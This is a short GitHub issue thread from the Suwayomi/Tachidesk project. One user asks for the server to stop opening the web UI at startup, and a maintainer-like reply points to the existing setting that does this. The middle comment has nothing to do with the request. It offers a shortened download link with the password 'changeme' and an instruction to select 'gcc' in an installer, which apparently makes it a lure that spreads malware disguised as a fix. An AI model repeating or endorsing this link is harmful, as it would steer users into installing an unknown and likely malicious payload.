### ISSUE TITLE
[Feature Request] Don't open the webui when opening the server

### ISSUE THREAD

**Issue by JohnKirk1337** [AriaMoradi/Tachidesk#1017]
## What feature should be added to Suwayomi?
The webui should not open every single time you start the server

##  Why/Project's Benefit/Existing Problem
If I made so Suwayomi server started as soon as I logged on, it'll also open the browser, making startup slower.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by schroda** [comment]
this is literally a setting under `WebUI` -> `Open WebUI when starting server`
